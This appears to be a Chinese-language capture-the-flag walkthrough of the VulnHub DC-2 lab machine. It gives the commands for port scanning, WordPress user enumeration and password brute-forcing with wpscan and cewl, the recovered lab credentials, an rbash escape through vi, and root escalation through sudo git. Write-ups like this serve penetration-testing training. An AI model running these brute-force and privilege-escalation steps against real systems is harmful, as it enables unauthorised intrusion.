文章目錄
-
- 一、環境搭建
- 二、滲透流程
- 三、思路總結
一、環境搭建
DC-2下載下傳位址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts檔案:192.168.144.150 DC-2

二、滲透流程
nmap -A -T5 -sV -sT -p- 192.168.144.150
開放端口:80(web)、 7744(ssh)
通路:192.168.144.150,web頁面擷取到flag1
flag1提示使用
cewl工具
進行暴力破解
進行目錄掃描,擷取到背景登入位址:
使用
http://dc-2/wp-admin
對wordpress使用者進行枚舉:
wpscan
擷取到三個使用者:admin、jerry、tom
wpscan --url http://dc-2 -e u
利用cewl工具生成密碼字典: cewl http://dc-2 -w passwd.txt
生成使用者字典: vim user1.txt
使用wpscan進行爆破: wpscan --url http://dc-2 -U user1.txt -P passwd.txt
擷取到了、
jerry:adipiscing
,登入背景,擷取到flag2
tom: parturient
flag2提示,如果此路不通,嘗試另一種方法,嘗試7744端口
ssh連接配接
tom登入成功
執行 ls指令
,發現flag3
限制,cat無法執行,vim無法執行,
rbash
vi可以執行
flag3提示可以嘗試切換一下使用者
使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
成功切換到jerry
su jerry
成功通路到 flag4
檢視是否有可以提權的指令: find / -perm -u=s -type f 2>/dev/null
sudo -l
:發現git可以利用,flag4也提示了可以使用git
:進入文本模式
sudo git help config
:擷取shell
!/bin/bash
擷取最後的 final-flag.txt
三、思路總結
1、nmap端口掃描,添加hosts檔案,通路web頁面;
2、dirb目錄掃描擷取背景登入位址;
3、cewl暴力破解擷取背景登入賬戶;
4、ssh遠端連接配接;
5、vi突破rbash切換使用者;
6、git提權;
參考連結:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2